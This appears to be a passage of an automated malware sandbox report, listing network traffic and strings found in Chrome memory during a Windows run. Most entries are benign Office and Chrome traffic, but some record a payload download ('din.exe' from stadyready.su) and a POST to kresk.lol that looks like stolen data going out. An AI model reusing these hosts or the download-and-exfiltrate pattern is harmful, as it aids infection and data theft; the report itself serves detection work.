Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /din.exe HTTP/1.1accept: /user-agent: downloader/0.2.8host: stadyready.su

Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.2472744199.0000377800F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2472846769.0000377800F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2472618293.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000015.00000003.2472744199.0000377800F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2472846769.0000377800F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2472618293.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: stadyready.su
Source: global traffic	DNS traffic detected: DNS query: iHFuwBwsuPMSXCezcESiLqwrfPI.iHFuwBwsuPMSXCezcESiLqwrfPI
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: kresk.lol
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KNGDBS0R1N7QQIMOZMYUUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kresk.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
